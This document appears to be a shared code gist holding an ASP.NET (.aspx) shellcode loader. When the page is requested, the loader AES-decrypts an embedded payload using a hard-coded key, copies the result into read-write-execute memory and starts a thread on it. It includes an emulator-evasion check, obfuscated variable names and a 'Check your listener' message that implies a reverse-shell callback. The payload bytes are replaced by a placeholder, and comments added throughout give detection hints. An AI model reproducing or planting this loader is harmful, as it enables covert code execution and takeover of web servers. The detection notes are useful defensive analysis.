Created
November 10, 2023 14:48
aspx shellcode
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
```cs | |
<%@ Page Language="C#" AutoEventWireup="true" %> | |
<%@ Import Namespace="System.IO" %> | |
<%@ Import Namespace="System.Security.Cryptography" %> | |
<script runat="server"> | |
// kernel32 P/Invoke declarations used by Page_Load below.
// VirtualAlloc and CreateThread are the two calls that place the decrypted bytes in memory and
// start a thread at that address. VirtualAllocExNuma and GetCurrentProcess are used only for
// the first allocation in Page_Load.
// NOTE(review): the signatures are non-standard (flProtect is declared IntPtr on VirtualAlloc,
// lpThreadId is a ref IntPtr on CreateThread), so static rules should match on the API names
// rather than on a particular parameter list.
// Detection: DllImport("kernel32") inside an .aspx page is rare in legitimate web content; a
// web-root scan for these API names in page files is a cheap static check.
[System.Runtime.InteropServices.DllImport("kernel32")] | |
private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect); | |
[System.Runtime.InteropServices.DllImport("kernel32")] | |
private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId); | |
[System.Runtime.InteropServices.DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] | |
private static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred); | |
[ System.Runtime.InteropServices.DllImport("kernel32.dll")] | |
private static extern IntPtr GetCurrentProcess(); | |
// Decrypts `data` with AES using the supplied key and IV and returns the resulting bytes.
//   data - ciphertext; Page_Load passes the embedded Enc array
//   key  - AES key; Page_Load passes a 32-byte array, matching KeySize = 256
//   iv   - initialisation vector; Page_Load passes a 16-byte array, matching BlockSize = 128
// The cipher mode is never set, so the framework default applies (CBC for Aes.Create() in .NET;
// confirm for the target runtime).
// There is no MAC or other integrity check: a wrong key or altered ciphertext yields different
// bytes, not an exception.
private byte[] Decrypt(byte[] data, byte[] key, byte[] iv) | |
{ | |
using (var aes = Aes.Create()) | |
{ | |
aes.KeySize = 256; | |
aes.BlockSize = 128; | |
// Zero padding has no length marker, so nothing is validated or stripped after decryption.
aes.Padding = PaddingMode.Zeros; | |
aes.Key = key; | |
aes.IV = iv; | |
using (var decryptor = aes.CreateDecryptor(aes.Key, aes.IV)) | |
{ | |
return PerformCryptography(data, decryptor); | |
} | |
} | |
} | |
// Runs `data` through `cryptoTransform` and returns the transformed bytes.
//   data            - input buffer, written to the transform in a single call
//   cryptoTransform - the transform to apply; Decrypt passes an AES decryptor
// The whole output is buffered in a MemoryStream; nothing is written to disk.
private byte[] PerformCryptography(byte[] data, ICryptoTransform cryptoTransform) | |
{ | |
using (var ms = new MemoryStream()) | |
using (var cryptoStream = new CryptoStream(ms, cryptoTransform, CryptoStreamMode.Write)) | |
{ | |
cryptoStream.Write(data, 0, data.Length); | |
// Flush the final block before reading, otherwise the last block is missing from ms.
cryptoStream.FlushFinalBlock(); | |
return ms.ToArray(); | |
} | |
} | |
// Arguments for the VirtualAlloc call in Page_Load: 0x1000 is MEM_COMMIT and 0x40 is
// PAGE_EXECUTE_READWRITE, i.e. memory that is writable and executable at the same time.
// Detection: a web worker process committing private RWX memory and then starting a thread
// inside it is a standard behavioural signal for EDR and memory-scanning tools.
private static Int32 MEM_COMMIT=0x1000; | |
private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40; | |
// Page load handler (wired up by AutoEventWireup="true" in the page directive), so the body
// runs when the page is requested. It decrypts the embedded byte array with the hard-coded key
// and IV, copies the result into RWX memory and starts a native thread at that address inside
// the process hosting the page. The response is the static HTML that follows the script block.
// Detection: a thread whose start address lies in private, unbacked executable memory of the
// web worker process, and network or child-process activity from that process after a request
// to an unfamiliar .aspx file.
protected void Page_Load(object sender, EventArgs e) | |
{ | |
// 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x4 = PAGE_READWRITE: one 0x1000-byte region is requested
// for the current process. The result is only compared below; it is never used or freed.
// NOTE(review): discarding the result of VirtualAllocExNuma is a pattern analysts associate
// with emulator checks in loaders; presumably that is the intent here.
IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0); | |
// mem is an IntPtr, a value type, so this comparison with null does not detect a failed
// allocation; as written the early return is not taken.
if(mem == null) | |
{ | |
return; | |
} | |
// Encrypted payload, declared as 688 bytes. The bracketed token on the next line is a
// placeholder ("shellcode" in Russian): the page omits the payload bytes.
byte[] Enc = new byte[688] { | |
0x46, <шеллкод> ,0x02 }; | |
// AES-256 key stored in the page itself. Anyone holding the file can decrypt the payload
// offline for analysis; encryption here only hides the payload bytes from static content scans.
byte[] Key = new byte[32] { | |
0x57, 0xef, 0x18, 0x5a, 0x8f, 0xd4, 0x32, 0xbc, 0x4f, 0x39, 0x66, 0x3f, 0x0c, 0x17, 0x0b, | |
0x1e, 0x9e, 0xb4, 0x82, 0x3e, 0x4d, 0x9d, 0xa9, 0x05, 0x90, 0x23, 0xee, 0x03, 0xa7, 0x81, | |
0x5f, 0xdd }; | |
// IV | |
byte[] Iv = new byte[16] { | |
0x6e, 0x8f, 0xa8, 0xdd, 0xe6, 0x8e, 0xe1, 0x10, 0x63, 0x17, 0x11, 0x02, 0xc8, 0xfb, 0x60, | |
0x6b }; | |
// Decrypted payload bytes (randomised local names from here on).
byte[] e4qRS= Decrypt(Enc, Key, Iv); | |
// RWX region sized to the payload; the return value is not checked before the copy.
IntPtr zG5fzCKEhae = VirtualAlloc(IntPtr.Zero,(UIntPtr)e4qRS.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE); | |
System.Runtime.InteropServices.Marshal.Copy(e4qRS,0,zG5fzCKEhae,e4qRS.Length); | |
IntPtr aj5QpPE = IntPtr.Zero; | |
// New thread starting at the copied bytes. The handle and thread id are not used again and
// nothing waits on the thread, so the request completes while it runs.
IntPtr oiAJp5aJjiZV = CreateThread(IntPtr.Zero,UIntPtr.Zero,zG5fzCKEhae,IntPtr.Zero,0,ref aj5QpPE); | |
} | |
</script> | |
<!DOCTYPE html> | |
<html> | |
<body> | |
<p>Check your listener...</p> | |
</body> | |
</html> | |
``` |